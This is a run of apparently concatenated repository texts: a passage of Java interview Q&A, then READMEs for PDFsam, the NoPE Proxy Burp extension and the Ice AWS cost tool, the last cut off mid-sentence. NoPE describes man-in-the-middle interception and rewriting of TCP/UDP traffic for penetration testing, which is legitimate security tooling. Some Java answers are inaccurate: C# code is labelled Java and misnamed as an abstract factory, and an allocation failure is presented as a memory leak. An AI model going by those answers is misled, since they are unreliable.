any external process in Java? In java, external process can be invoked using **exec()** method of **Runtime Class**. **Example:** ```java /** * exec() */ import java.io.IOException; class ExternalProcessExample { public static void main(String[] args) { try { // Command to create an external process String command = "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"; // Running the above command Runtime run = Runtime.getRuntime(); Process proc = run.exec(command); } catch (IOException e) { e.printStackTrace(); } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the static import? The static import feature of Java 5 facilitate the java programmer to access any static member of a class directly. There is no need to qualify it by the class name. ```java /** * Static Import */ import static java.lang.System.*; class StaticImportExample { public static void main(String args[]) { out.println("Hello");// Now no need of System.out out.println("Java"); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the difference between factory and abstract factory pattern? The Factory Method is usually categorised by a switch statement where each case returns a different class, using the same root interface so that the calling code never needs to make decisions about the implementation. **Example:** credit card validator factory which returns a different validator for each card type. ```java /** * Abstract Factory Pattern */ public ICardValidator GetCardValidator (string cardType) { switch (cardType.ToLower()) { case "visa": return new VisaCardValidator(); case "mastercard": case "ecmc": return new MastercardValidator(); default: throw new CreditCardTypeException("Do not recognise this type"); } } ``` Abstract Factory patterns work around a super-factory which creates other factories. This factory is also called as factory of factories. This type of design pattern comes under creational pattern as this pattern provides one of the best ways to create an object. In Abstract Factory pattern an interface is responsible for creating a factory of related objects without explicitly specifying their classes. Each generated factory can give the objects as per the Factory pattern. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the methods used to implement for key Object in HashMap? **1. equals()** and **2. hashcode()** Class inherits methods from the following classes in terms of HashMap * java.util.AbstractMap * java.util.Object * java.util.Map <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a Memory Leak? The standard definition of a memory leak is a scenario that occurs when **objects are no longer being used by the application, but the Garbage Collector is unable to remove them from working memory** – because they\'re still being referenced. As a result, the application consumes more and more resources – which eventually leads to a fatal OutOfMemoryError. Some tools that do memory management to identifies useless objects or memeory leaks like: * <a href="https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c00990822&docLocale=en_US">HP OpenView</a> * <a href="https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumber=HPJMETER">HP JMETER</a> * <a href="http://www.javaperformancetuning.com/tools/jprobe/index.shtml">JProbe</a> * <a href="https://www.ibm.com/support/knowledgecenter/en/SSTFXA_6.3.0/com.ibm.itm.doc_6.3/install/itm_over.htm">IBM Tivoli</a> **Example:** ```java /** * Memory Leaks */ import java.util.Vector; public class MemoryLeaksExample { public static void main(String[] args) { Vector v = new Vector(214444); Vector v1 = new Vector(214744444); Vector v2 = new Vector(214444); System.out.println("Memory Leaks Example"); } } ``` Output ```java Exception in thread "main" java.lang.OutOfMemoryError: Java heap space exceed ``` **Types of Memory Leaks in Java:** * Memory Leak through static Fields * Unclosed Resources/connections * Adding Objects With no `hashCode()` and `equals()` Into a HashSet * Inner Classes that Reference Outer Classes * Through `finalize()` Methods * Calling `String.intern()` on Long String <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. The difference between Serial and Parallel Garbage Collector? **1. Serial Garbage Collector:** Serial garbage collector works by holding all the application threads. It is designed for the single-threaded environments. It uses just a single thread for garbage collection. The way it works by freezing all the application threads while doing garbage collection may not be suitable for a server environment. It is best suited for simple command-line programs. Turn on the `-XX:+UseSerialGC` JVM argument to use the serial garbage collector. **2. Parallel Garbage Collector:** Parallel garbage collector is also called as throughput collector. It is the default garbage collector of the JVM. Unlike serial garbage collector, this uses multiple threads for garbage collection. Similar to serial garbage collector this also freezes all the application threads while performing garbage collection. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between WeakReference and SoftReference in Java? **1. Weak References:** Weak Reference Objects are not the default type/class of Reference Object and they should be explicitly specified while using them. ```java /** * Weak Reference */ import java.lang.ref.WeakReference; class MainClass { public void message() { System.out.println("Weak References Example"); } } public class Example { public static void main(String[] args) { // Strong Reference MainClass g = new MainClass(); g.message(); // Creating Weak Reference to MainClass-type object to which 'g' // is also pointing. WeakReference<MainClass> weakref = new WeakReference<MainClass>(g); g = null; g = weakref.get(); g.message(); } } ``` **2. Soft References:** In Soft reference, even if the object is free for garbage collection then also its not garbage collected, until JVM is in need of memory badly.The objects gets cleared from the memory when JVM runs out of memory.To create such references java.lang.ref.SoftReference class is used. ```java /** * Soft Reference */ import java.lang.ref.SoftReference; class MainClass { public void message() { System.out.println("Soft References Example"); } } public class Example { public static void main(String[] args) { // Strong Reference MainClass g = new MainClass(); g.message(); // Creating Soft Reference to MainClass-type object to which 'g' // is also pointing. SoftReference<MainClass> softref = new SoftReference<MainClass>(g); g = null; g = softref.get(); g.message(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How Garbage collector algorithm works? Garbage collection works on **Mark** and **Sweep** algorithm. In Mark phase it detects all the unreachable objects and Sweep phase it reclaim the heap space used by the garbage objects and make the space available again to the program. There are methods like `System.gc()` and `Runtime.gc()` which is used to send request of Garbage collection to JVM but it\'s not guaranteed that garbage collection will happen. If there is no memory space for creating a new object in Heap Java Virtual Machine throws `OutOfMemoryError` or `java.lang.OutOfMemoryError` heap space <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Java Program to Implement Singly Linked List? The singly linked list is a linear data structure in which each element of the list contains a pointer which points to the next element in the list. Each element in the singly linked list is called a node. Each node has two components: data and a pointer next which points to the next node in the list. **Example:** ```java public class SinglyLinkedList { // Represent a node of the singly linked list class Node{ int data; Node next; public Node(int data) { this.data = data; this.next = null; } } // Represent the head and tail of the singly linked list public Node head = null; public Node tail = null; // addNode() will add a new node to the list public void addNode(int data) { // Create a new node Node newNode = new Node(data); // Checks if the list is empty if(head == null) { // If list is empty, both head and tail will point to new node head = newNode; tail = newNode; } else { // newNode will be added after tail such that tail's next will point to newNode tail.next = newNode; // newNode will become new tail of the list tail = newNode; } } // display() will display all the nodes present in the list public void display() { // Node current will point to head Node current = head; if(head == null) { System.out.println("List is empty"); return; } System.out.println("Nodes of singly linked list: "); while(current != null) { // Prints each node by incrementing pointer System.out.print(current.data + " "); current = current.next; } System.out.println(); } public static void main(String[] args) { SinglyLinkedList sList = new SinglyLinkedList(); // Add nodes to the list sList.addNode(10); sList.addNode(20); sList.addNode(30); sList.addNode(40); // Displays the nodes present in the list sList.display(); } } ``` **Output:** ```java Nodes of singly linked list: 10 20 30 40 ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What do we mean by weak reference? A weakly referenced object is cleared by the Garbage Collector when it\'s weakly reachable. Weak reachability means that an object has neither strong nor soft references pointing to it. The object can be reached only by traversing a weak reference. To create such references `java.lang.ref.WeakReference` class is used. ```java /** * Weak reference */ import java.lang.ref.WeakReference; class WeakReferenceExample { public void message() { System.out.println("Weak Reference Example!"); } } public class MainClass { public static void main(String[] args) { // Strong Reference WeakReferenceExample obj = new WeakReferenceExample(); obj.message(); // Creating Weak Reference to WeakReferenceExample-type object to which 'obj' // is also pointing. WeakReference<WeakReferenceExample> weakref = new WeakReference<WeakReferenceExample>(obj); obj = null; // is available for garbage collection. obj = weakref.get(); obj.message(); } } ``` Output ```java Weak Reference Example! Weak Reference Example! ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the different types of JDBC Driver? JDBC Driver is a software component that enables java application to interact with the database. There are 4 types of JDBC drivers: 1. **JDBC-ODBC bridge driver**: The JDBC-ODBC bridge driver uses ODBC driver to connect to the database. The JDBC-ODBC bridge driver converts JDBC method calls into the ODBC function calls. This is now discouraged because of thin driver. 1. **Native-API driver**: The Native API driver uses the client-side libraries of the database. The driver converts JDBC method calls into native calls of the database API. It is not written entirely in java. 1. **Network Protocol driver**: The Network Protocol driver uses middleware (application server) that converts JDBC calls directly or indirectly into the vendor-specific database protocol. It is fully written in java. 1. **Thin driver**: The thin driver converts JDBC calls directly into the vendor-specific database protocol. That is why it is known as thin driver. It is fully written in Java language. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What additional methods for working with associative arrays (maps) appeared in Java 8? * `putIfAbsent()` adds a key-value pair only if the key was missing: ```java map.putIfAbsent("a", "Aa"); ``` * `forEach()` accepts a function that performs an operation on each element: ```java map.forEach((k, v) -> System.out.println(v)); ``` * `compute()` creates or updates the current value to the result of the calculation (it is possible to use the key and the current value): ```java map.compute("a", (k, v) -> String.valueOf(k).concat(v)); //["a", "aAa"] ``` * `computeIfPresent()` if the key exists, updates the current value to the result of the calculation (it is possible to use the key and the current value): ```java map.computeIfPresent("a", (k, v) -> k.concat(v)); ``` * `computeIfAbsent()` if the key is missing, creates it with the value that is calculated (it is possible to use the key): ```java map.computeIfAbsent("a", k -> "A".concat(k)); //["a","Aa"] ``` * `getOrDefault()` if there is no key, returns the passed value by default: ```java map.getOrDefault("a", "not found"); ``` * `merge()` accepts a key, a value, and a function that combines the transmitted and current values. If there is no value under the specified key, then it writes the transmitted value there. ```java map.merge("a", "z", (value, newValue) -> value.concat(newValue)); //["a","Aaz"] ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is LocalDateTime? `LocalDateTime`combines together `LocaleDate`and `LocalTime`contains the date and time in the calendar system ISO-8601 without reference to the time zone. Time is stored accurate to the nanosecond. It contains many convenient methods such as plusMinutes, plusHours, isAfter, toSecondOfDay, etc. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is ZonedDateTime? `java.time.ZonedDateTime`- an analogue `java.util.Calendar`, a class with the most complete amount of information about the temporary context in the calendar system ISO-8601. It includes a time zone, therefore, this class carries out all operations with time shifts taking into account it. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to determine repeatable annotation? To define a repeatable annotation, you must create a container annotation for the list of repeatable annotations and designate a repeatable meta annotation `@Repeatable`: ```java @interface Schedulers { Scheduler [] value (); } @Repeatable ( Schedulers . Class) @interface Scheduler { String birthday () default "Jan 8 2000"; } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What class appeared in Java 8 for encoding / decoding data? `Base64`- a thread-safe class that implements a data encoder and decoder using a base64 encoding scheme according to RFC 4648 and RFC 2045 . Base64 contains 6 basic methods: `getEncoder() / getDecoder()`- returns a base64 encoder / decoder conforming to the RFC 4648 standard ; getUrlEncoder()/ `getUrlDecoder()`- returns URL-safe base64 encoder / decoder conforming to RFC 4648 standard ; `getMimeEncoder() / getMimeDecoder()`- returns a MIME encoder / decoder conforming to RFC 2045 . <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to create a Base64 encoder and decoder? ```java // Encode String b64 = Base64.getEncoder().encodeToString ( " input " . getBytes ( " utf-8 " )); // aW5wdXQ == // Decode new String ( Base64.getDecoder().decode ( " aW5wdXQ == " ), " utf-8 " ); // input ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> #### Q. Give me an example of design pattern which is based upon open closed principle? #### Q. How do you test static method? #### Q. How to do you test a method for an exception using JUnit? #### Q. Which unit testing libraries you have used for testing Java programs? #### Q. What is the difference between @Before and @BeforeClass annotation? <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div>
PDFsam, a desktop application to split, merge, mix, rotate PDF files and extract pages
combine extract java javafx merge merge-pdf merger pdf pdf-combiner pdf-extractor pdf-manipulation pdf-merge pdf-mix pdf-rotate pdf-split rotate split split-pdf splitter
PDFsam (PDF Split And Merge) ============================== Official SCM repository for PDFsam Basic, a free and open source, multi-platform software designed to extract pages, split, merge, mix and rotate PDF files. ![Build Status](https://github.com/torakiki/pdfsam/actions/workflows/build.yml/badge.svg) [![License](http://img.shields.io/badge/license-AGPLv3-blue.svg)](http://www.gnu.org/licenses/agpl-3.0.html) ![](pdfsam-docs/graphics/pdfsam-merge.gif) Where ------------------- Official website [pdfsam.org](https://pdfsam.org/ "PDFsam") License ------------------- Since version 3 PDFsam Basic is open source under the [GNU Affero General Public License], previous versions are released under GPLv2. Requirements ------------------- PDFsam Basic is written using JavaFX. Since version 4 it is released as a self-contained application and bundles a jlinked JDK while version 3 requires a Java Runtime Environment 8 with JavaFx installed in order to run. Documentation ------------------- Some [documentation](https://pdfsam.org/documentation/) and [FAQ](https://pdfsam.org/faq/) Build ------------------- This is a [simple guide](https://github.com/torakiki/pdfsam/wiki/Build-and-run) that can help you to build PDFsam Basic Contribute ------------------ Contributes are more then welcome, just please make sure you first read the [contributing guidelines](CONTRIBUTING.md) Translations ------------------ If you want to contribute translating PDFsam to your language you can do it [here](https://translations.launchpad.net/pdfsam/pdfsam-v3) Tips and tweaks ------------------ A list of properties and arguments that can tweak PDFsam behavior can be found [here](https://github.com/torakiki/pdfsam/wiki/Properties-and-arguments) [GNU Affero General Public License]: http://www.gnu.org/licenses/agpl-3.0.html
TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite.
appsec appsecurity burp-extensions burp-plugin burpsuite burpsuite-extender hacking mitmproxy pentesting protobuf proxy tcp tcpproxy udp updproxy websockets
# NoPE Proxy ![GitHub last commit](https://img.shields.io/github/last-commit/factionsecurity/faction) ![GitHub Release Date - Published_At](https://img.shields.io/github/release-date/factionsecurity/faction) [![](https://img.shields.io/badge/null0perat0r-it?style=flat-square&logo=mastodon&labelColor=white&color=white&link=https%3A%2F%2Finfosec.exchange%2F%40null0perat0r)](https://infosec.exchange/@null0perat0r) [![](https://img.shields.io/twitter/follow/null0perar0r)](https://twitter.com/intent/follow?screen_name=null0perar0r) <img align="right" style="width:400px; margin-top: 70px" src="Nope.png"/> __A TCP/UDP Non-HTTP Proxy Extension for Burp Suite__ ## [Download Latest Release Here](https://github.com/summitt/Burp-Non-HTTP-Extension/releases) ## [Manual and Guides Here](https://github.com/summitt/Burp-Non-HTTP-Extension/wiki) ## [Community Nope Scripts](https://github.com/summitt/Nope-Proxy-Scripts) ## [Support](https://www.patreon.com/null0perat0r) ## [Follow](https://defcon.social/@Null0perat0r) ## Introduction This burp extension adds three main features to BurpSuite. 1. Interceptors for TCP and UDP traffic. 2. A configurable DNS server. This will route all DNS requests to Burp or preconfigured hosts. It makes it easier to send mobile or thick client traffic to Burp. You need to create invisible proxy listeners in BurpSuite for the Burp to intercept HTTP traffic or you can use the second feature of this extension to intercept binary/non-http protocols. 3. A Non-HTTP MiTM Intercepting proxy. This extension allows you to create multiple listening ports that can MiTM server side services. It also uses Burp's CA cert so that if the browser or mobile device is already configured to access SSL/TLS requests using this cert then the encrypted binary protocols will be able to connect without generating errors too. It also provides the ability to automatically match and replace hex or strings as they pass through the proxy or you can use custom python code to manipulate the traffic. ![](http://imgur.com/X6xYsq8.png) ## DNS Server Configuration ![](http://imgur.com/0ezoO7f.png) The DNS server configuration allows granular control over your DNS settings. You can configure it to send all traffic to the same IP address as Burp or you can use a Custom Hosts File to configure only some hosts to be forward to Burp while others can be forwarded to other hosts. It can also be confgured to send all requests to the real IP unless specified in the custom hosts file. The DNS server automatically starts with the IP address of the last interface you set in the Interface input box. Changing the interface number will automatically change the IP address. The server will need to be restarted for this change to take effect. The Custom Hosts File is not related at all to your normal hosts file and will over ride it. If the ‘Use DNS Response IP’ checkbos is checked (default) then the extension will resolve all hosts not in the Custom hosts file to which ever IP address is set in the ‘DNS Response IP’ input box. If this box is not checked then the extension will resolve the Real IP address unless it has been overridden in the ‘Custom Hosts File’ ## Port Monitoring Nope Proxy has a port monitor that will only display tcp and udp ports that a remote client is attempting to connect on. This combined with the DNS history can help you find which hosts and ports a mobile app or thin client is attempting to contact so that you can create interceptors for this traffic and proxy it to the real servers. ## Non-HTTP MiTM proxy ![](http://imgur.com/oCHMjuH.png) This non-HTTP proxy has several features built in. - All requests and responses are saved to a sqlite database and can be exported or imported into the tool. - Automatic Match and Replace Rules that are customizable based on the direction of traffic. (Client to Server, Server to Client, or Both. - Match and replace rules support both hex and string replacement. - Manual Interception binary protocols and change them before sending them back to the server or client. Just like the normal Burp proxy but with binary streams. - Python Code can be used instead of the normal Match and Replace Rules for more advancing mangling of requests and responses. - Use python code to reformat requests in history without changing outgoing or incomming requests. (e.g. Convert protobuf to JSON or human readable formats without modifying the incomming or outgoing traffic) ## TCP/UDP Repeater ![](http://imgur.com/aNpzAdz.png) - TCP/UDP repeater can be used to replay requests to the client or server on the currently connected socket streams. - Code Playground allows you to create a custom python payload based on the request currently displayed in the repeater. - Search TCP/UDP proxy history ## Configure the proxies ![](http://imgur.com/WdsB32L.png) To perform normal intercepting of binary traffic of applications you can set the DNS IP address to the extension’s IP address and then create a Listener Under ‘Server Config’. This requires that you know the hostname and Port the application is trying to connect. You can switch to the ‘DNS History’ Tab to view the DNS queries and ports that are trying to connect to you. You could also run wireshark but Nope will filter this information for you. Once you know the right host name and port you can configure these settings as shown above. If the service is using SSL then you need to export burp’s CA cert to the same folder that Burp is running out of for the extension to find it and generate certs that will pass certificate verification. Then you can check the SSL check box before adding the proxy. The proxy does not start until ‘enable’ is checked in the table. Once the proxy is started you can intercept it in real time. All your traffic will be logged into the TCP History Tab and stored locally in a sqlite database. The database can be exported or imported from the Server Configuration Tab. In addition, if Burp crashes or you close burp without saving the TCP History it will still be automatically loaded when you start Burp. ## Manual Intercept Traffic ![](http://imgur.com/X6xYsq8.png) Clicking on the TCP Intercept Tab will allow to enable and disable Manual Intercepting. This will be very similar to intercepting HTTP traffic with burp. If the data sent is just strings then it’s very simple to just replace text or attempt modification to the request. If the application is sending serialized objects or protobuffs then you will need to switch between Raw and Hex mode to ensure the data is encoded correctly and length checks are correct. ## Automated Manipulation of Traffic Once you have your ideal payload you can automatically match and replace in the Automation Tab. ![](http://imgur.com/CBRQVIo.png) If the ‘Enable Python Manger’ is left uncheck (default) then the Match and Replace Rules are used. It supports both hex, string, and directional replacement. The ‘#’ can be used to comment out a line and rules are updated as soon as you press a single key. If you want to replace the string ‘test’ with ‘hacked’ then you could use the following rule: ``` test||hacked ``` This will affect traffic in both directions. You could make it serve to client only by using the following rule: ``` test||hacked||c2sOnly ``` You could also perform the same replacement as hex using the following rule: ``` 0x74657374||6861636B6565||c2sOnly ``` ## Python Mangler The previous example is great for quickly fuzzing the request but more complicated examples may require actual coding. The Python Mangler was built to provide far more control of the requests and responses. You can import a library to extract the data into a more easily editable form and covert it back before sending to the server. The PyManger must have at the minimum the following structure. You can download community [Nope Scripts here](https://github.com/summitt/Nope-Proxy-Scripts) ``` def mangle(input, isC2S): return input ``` The ‘input’ variable is a byte array, the ‘isC2S’ variable is a Boolean value, and the output must also be a byte array (though python seems somewhat forgiving here). This will allow directional specifying changes the traffic. Using PyMangler you can perform the same rule change above by writing the following code. ``` def mangle(input, isC2S): if isC2S: input = input.replace(‘test’,’hacked’) return input ``` You can import external libraries, create classes, and do anything you can do in normal python as long as there is a ‘mangle’ function with the same inputs to process the traffic. If you import custom classes they will need to be placed in the same folder that is running BurpSuite unless they are in your path. ## Python Pre and Post Interceptor Functions You can use the pre and post interceptors do all kinds of things with the stream. I was originally created to allow converting streams to a more human readable format before sending the data to the interceptor. Once modified in the interceptor the postInterceptor can convert it back to the binary stream. ``` def preIntercept(input,isC2S): return input def postIntercept(input,isC2S): return input ``` Below is an example of a server that is sending protobuf messages. Notice the stream would be difficult to modify by hand. ![](NonHTTPProxy/screenshots/PreFormat.PNG) Now we use the pre and post interceptor functions to make it easier to modify in transit. Notice the python console on the Right will display in 'print' statements as well as errors in your python code when it runs. *Note that if the functions fail the NoPE proxy will send the original paylaods and ignore any changes to the stream you made.* ![](NonHTTPProxy/screenshots/PythonConsole.PNG) Below is an example of the now Human Readable and Editable Protobufs. ![](NonHTTPProxy/screenshots/Post%20Format.PNG)A ## Highlighting Traffic You can select mutliple requests and responses and highlight them with custom colors. You can even search only highlighted items. This makes is easy to find interesting requests later that you might want to dig into further. ![image](https://github.com/summitt/Nope-Proxy/assets/2343831/ee6d6f98-6f9b-4644-8fa3-5573c058ee7c) ### Upcomming features - UDP repeater - Switches in the python manger for TCP or UDP request only modification - Ability to decrypted encrypted UDP traffic like QUIC and other protocols - Ability to auto sense encrypted traffic so it can better decode XMPP, SSH, SFTP, etc.
AWS Usage Tool
aws aws-billing cost finops ice
# Ice [![Build Status](https://travis-ci.org/Teevity/ice.svg?branch=master)](https://travis-ci.org/Teevity/ice) ## Intro Ice provides a birds-eye view of our large and complex cloud landscape from a usage and cost perspective. Cloud resources are dynamically provisioned by dozens of service teams within the organization and any static snapshot of resource allocation has limited value. The ability to trend usage patterns on a global scale, yet decompose them down to a region, availability zone, or service team provides incredible flexibility. Ice allows us to quantify our AWS footprint and to make educated decisions regarding reservation purchases and reallocation of resources. Ice is a Grails project. It consists of three parts: processor, reader and UI. Processor processes the Amazon detailed billing file into data readable by reader. Reader reads data generated by processor and renders them to UI. UI queries reader and renders interactive graphs and tables in the browser. ## What it does Ice communicates with AWS Programmatic Billing Access and maintains knowledge of the following key AWS entity categories: - Accounts - Regions - Services (e.g. EC2, S3, EBS) - Usage types (e.g. EC2 - m1.xlarge) - Cost and Usage Categories (On-Demand, Reserved, etc.) The UI allows you to filter directly on the above categories to custom tailor your view. In addition, Ice supports the definition of Application Groups. These groups are explicitly defined collections of resources in your organization. Such groups allow usage and cost information to be aggregated by individual service teams within your organization, each consisting of multiple services and resources. Ice also provides the ability to email weekly cost reports for each Application Group showing current usage and past trends. When representing the cost profile for individual resources, Ice will factor the depreciation schedule into your cost contour, if so desired. The ability to amortize one-time purchases, such as reservations, over time allows teams to better evaluate their month-to-month cost footprint. ## Screenshots 1. Summary page grouped by accounts ![Summary page grouped by accounts](https://github.com/Netflix/ice/blob/master/screenshots/ss_summary.png?raw=true) 2. Detail page with throughput metrics and grouped by products ![Detail page with throughput metrics and grouped by products](https://github.com/Netflix/ice/blob/master/screenshots/ss_detail.png?raw=true) 3. Reservation page grouped by on-demand, un-used, reserved, upfront costs ![Reservation page](https://github.com/Netflix/ice/blob/master/screenshots/ss_reservation_byreservation.png?raw=true) 4. Reservation page with on-demand cost and grouped by instance types ![Reservation page with on-demand cost and grouped by instance types](https://github.com/Netflix/ice/blob/master/screenshots/ss_reservation_bytype.png?raw=true) 5. Breakdown page of Application Groups ![Breakdown page of Application Groups](https://github.com/Netflix/ice/blob/master/screenshots/ss_breakdown_appgroup.png?raw=true) ## Prerequisite: 1. First sign up for Amazon's programmatic billing access [here](http://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/detailed-billing-reports.html) to receive detailed billing(hourly) reports. Verify you receive monthly billing file in the following format: `<accountid>-aws-billing-detailed-line-items-<year>-<month>.csv.zip`. 2. Install Grails 2.4.4 and set GRAILS_HOME and JAVA_HOME 3. Ice uses [highstock](http://www.highcharts.com/) to generate interactive graphs. Please make sure you acquire the proper license before using it. ## Basic setup: Using basic setup, you don't need any extra code change and you will use the provided bootstrap.groovy. You will need to construct your own ice.properties file and have it in your classpath (I put it at src/java). You can use sample.properties (located at src/java) file as the template. 1. Processor configuration 1.1 Enable processor in ice.properties: ice.processor=true 1.2 In ice.properties, set up the local directory where the processor can copy the billing file to and store the output files. The directory must pre-exist. For example: ice.processor.localDir=/mnt/ice_processor 1.3 In ice.properties, set up the working s3 bucket and working s3 bucket file prefix to upload the processed output files which will be read by reader. Ice must have read and write access to the s3 bucket. For example: ice.work_s3bucketname=work_s3bucketname ice.work_s3bucketprefix=work_s3bucketprefix/ 1.4 If running locally, set the following system properties at runtime. ice.s3AccessToken is optional. ice.s3AccessKeyId=<accessKeyId> ice.s3SecretKey=<secretKey> ice.s3AccessToken=<accessToken> If running on a ec2 instance and you want to use the credentials in the instance metadata, you can leave the above properties unset. 1.5 In ice.properties, specify the start time in millis for the processor to start processing billing files. For example, if you want to start processing billing files from April 1, 2013. If this property is not set, Ice will set startmillis to be the beginning of current month. ice.startmillis=1364774400000 1.6 Set up s3 billing bucket in ice.properties. If you have multiple payer accounts, you will need to specify multiple values for each property. # s3 bucket name where the billing files are. multiple bucket names are delimited by ",". Ice must have read access to billing s3 bucket. ice.billing_s3bucketname=billing_s3bucketname1,billing_s3bucketname2 # prefix of the billing files. multiple prefixes are delimited by "," ice.billing_s3bucketprefix=, # location for the billing bucket. It should be specified for buckets using v4 validation ice.billing_s3bucketregion=eu-west-1,eu-central-1 # specify your payer account id here if across-accounts IAM role access is used. multiple account ids are delimited by ",". "ice.billing_payerAccountId=,222222222222" means assumed role access is only used for the second bucket. ice.billing_payerAccountId=,123456789012 # specify the assumed role name here if you use IAM role access to read from billing s3 bucket. multiple role names are delimited by ",". "ice.billing_accessRoleName=,ice" means assumed role access is only used for the second bucket. ice.billing_accessRoleName=,ice # specify external id here if it is used. multiple external ids are delimited by ",". if you don't use external id, you can leave this property unset. ice.billing_accessExternalId= Tip: If you have multiple payer accounts, or Ice is running from a different account of the s3 billing bucket, for example Ice is running in account "test", while the billing files are written to bucket in account "prod", account "test" does not have read access to those billing files because Amazon created them. In this case, the recommended way is to use cross-accounts IAM roles. E.g. you can create an assumed role "ice". In "prod" account, grant assumed role "ice" with read access to billing bucket, then specify ice.billing_accessRoleName=ice. You can also create a secondary s3 bucket in account "prod" and grant read access to account "test", and then create a billing file poller running in account "prod" to copy billing files to the secondary bucket. 1.7 Specify account id and account name mappings in ice.properties. This is for readability purposes. For example: ice.account.account1=123456789011 ice.account.account2=123456789012 ice.account.account3=123456789013 1.8 If you have reserved ec2 instances, please also make sure Ice has the permission to make ec2 call describeReservedInstancesOfferings, which is used to get ri prices. 2. Reader configuration 2.1 Enable reader in ice.properties: ice.reader=true 2.2 In ice.properties, set up the local directory where the reader will copy files to. The local directory must pre-exist. For example: ice.reader.localDir=/mnt/ice_reader Make sure the local directory is different if you run processor and reader on the same instance. 2.3 Same as 1.3 2.4 Same as 1.4 2.5 Same as 1.5 2.6 Specify your organization name in ice.properties. This will show up in the UI header. ice.companyName=Your Company Name 2.7 You can choose to show cost in currency other than "$". To enable other currency, specify the following properties in ice.properties: # Specify your currency sign here. The default value is $. For other currency symbols, you can use UTF-8 code, e.g. for ¥, you can use ice.currencySign=\u00A5 ice.currencySign=£ # Specify your currency conversion rate here. The default value is 1. If 1 pound = 1.5 dollar, then the rate is 0.6666667. ice.currencyRate=0.6666667 2.8 By default, Ice pulls in [Highstock](https://www.highcharts.com/) from its CDN. ice.highstockUrl=https://example.com/js/highstock.js 3. Running Ice After the processor and reader setup, you can choose to run the processor and reader on the same or different instances. Running on different instances is recommended. For the first time, you should FIRST RUN PROCESSOR. Make sure you see non-empty output files in your working s3 bucket. Then run reader and browse to http://localhost:8080/ice/dashboard/summary. Here are the steps of getting ice running locally: 3.1 Pull the project 3.2 Run `grails wrapper` from the project root directory. This step will pull all necessary jar from maven central. 3.3 Construct ice.properties for processor and make sure ice.properties is added to directory src/java 3.4 Run Ice processor. From project root directory, run `./grailsw run-app`. Note you may need to add system properties like `./grailsw -Dice.s3AccessKeyId=<s3AccessKeyId> -Dice.s3SecretKey=<s3SecretKey> run-app`. To verify Ice processor runs successfully, make sure you see un-empty output files in your working S3 bucket, e.g. tagdb_all, cost_weekly_all, cost_daily_all_2013, etc. 3.5 Repeat steps 3.3 and 3.4 to run Ice reader. Tip: Sometimes you want to re-start from a clean slate. To do that: a) Get the latest code b) Delete all files from your working s3 bucket under the working prefix c) Delete all files from your local ice directory (for processor and reader) d) Start Ice in processor mode. Make sure it runs correctly. e) Then start Ice in reader mode. ## Ice Cookbook: 1. A community cookbook is available for deploying Ice via Chef here https://github.com/mdsol/ice_cookbook. ## Ice Docker Image: 1. A community image is available for deploying Ice via Docker here https://github.com/jonbrouse/docker-ice ## Advanced options: Options with * require writing your own code. 1. Basic reservation service If you have reserved instances in your accounts, you may want to make use of the reservation view in the UI, where you can browse/analyze your on-demand, unused reserved instance usage & cost of different instance types in different regions, zones and accounts. in Bootstrap.groovy, BasicReservationService is used. You can specify reservation period and reservation utilization type in ice.properties: # reservation period, possible values are oneyear, threeyear ice.reservationPeriod=threeyear # reservation utilization, possible values are LIGHT, HEAVY ice.reservationUtilization=HEAVY 2. Reservation capacity poller To use BasicReservationService, you should also run reservation capacity poller, which will call ec2 API (describeReservedInstances) to poll reservation capacities for each reservation owner account defined in ice.properties. The reservation capacities history is stored in a file in s3 bucket. To run reservation capacity poller, following steps below: 2.1 Set ice.reservationCapacityPoller=true in ice.properties 2.2 Make sure you set up reservation owner accounts in ice.properties. For example: ice.owneraccount.account1= ice.owneraccount.account2=account3,account4 ice.owneraccount.account5=account6 2.3 If you need to poll reservation capacity of different accounts, set up IAM roles. Then specify the assumed roles and external ids in ice.properties. For example, if assumed role "ice" is used: ice.owneraccount.account1.role=ice ice.owneraccount.account2.role=ice ice.owneraccount.account5.role=ice If you use external id too, specify it like following: ice.owneraccount.account1.externalId= 3. On-demand instance cost alert You can set set an on-demand instance cost threshold so that alert emails will be sent through Amazon SES if the threshold is reached within last 24 hours. The alert emails will be sent no more than once a day. The following properties are needed in ice.properties: # url prefix, e.g. http://ice.netflix.com/. This is used to create the link in alert email ice.urlPrefix= # from email address, this email must be registered in ses. ice.fromEmail= # ec2 ondemand hourly cost threshold to send alert email. The alert email will be sent at most once per day. ice.ondemandCostAlertThreshold=250 # ec2 ondemand hourly cost alert emails, separated by "," ice.ondemandCostAlertEmails= 4. Sharing reserved instances among accounts (*) All linked accounts under the same payer account can share each other's reservations (see http://docs.aws.amazon.com/awsaccountbilling/latest/about/AboutConsolidatedBilling.html). If reserved instances are shared among accounts, please specify them in ice.properties. For example: # set reservation owner accounts. In the example below, account1, account2, account3 and account4 are linked under the same payer account. account5, account6 are linked under the same payer account. # if reservation capacity poller is enabled, the poller will try to poll reservation capacity through ec2 API 